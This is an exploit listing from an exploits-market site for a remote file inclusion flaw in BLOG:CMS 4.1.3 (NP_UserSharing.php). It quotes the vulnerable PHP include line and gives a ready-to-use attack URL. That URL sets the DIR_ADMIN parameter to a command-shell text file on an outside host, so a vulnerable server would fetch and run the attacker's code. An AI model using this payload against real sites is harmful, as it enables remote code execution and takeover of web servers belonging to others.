[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability

Author
HACKERS PAL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1255
Category
web applications
Date add
12-12-2006
Platform
unsorted
=====================================================================
BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability
=====================================================================



BLOG:CMS Remote file include Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net

global $DIR_ADMIN;
include ( substr($DIR_ADMIN,0,strpos($DIR_ADMIN,'admin'))."photo".DIRECTORY_SEPARATOR."includes".DIRECTORY_SEPARATOR."user.class.php");

http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin



#  0day.today [2024-11-16]  #